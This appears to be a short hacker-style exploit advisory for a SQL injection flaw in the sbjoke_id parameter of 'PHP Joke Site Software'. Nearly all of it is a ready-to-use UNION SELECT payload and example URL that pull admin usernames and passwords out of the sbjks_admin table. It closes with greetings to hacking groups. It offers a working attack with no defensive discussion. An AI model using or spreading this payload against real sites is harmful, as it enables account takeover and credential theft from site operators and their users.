PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability



[#] Title:    PHP Joke Site Software (sbjoke_id) SQL Injection Vuln


[#] Link:    http://www.softbizscripts.com/jokes-script-features.php

[#] Author:    BorN To K!LL - h4ck3r

[#] 3xploit:

/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] 3xample:

http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--

[#] Greetings:

[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ...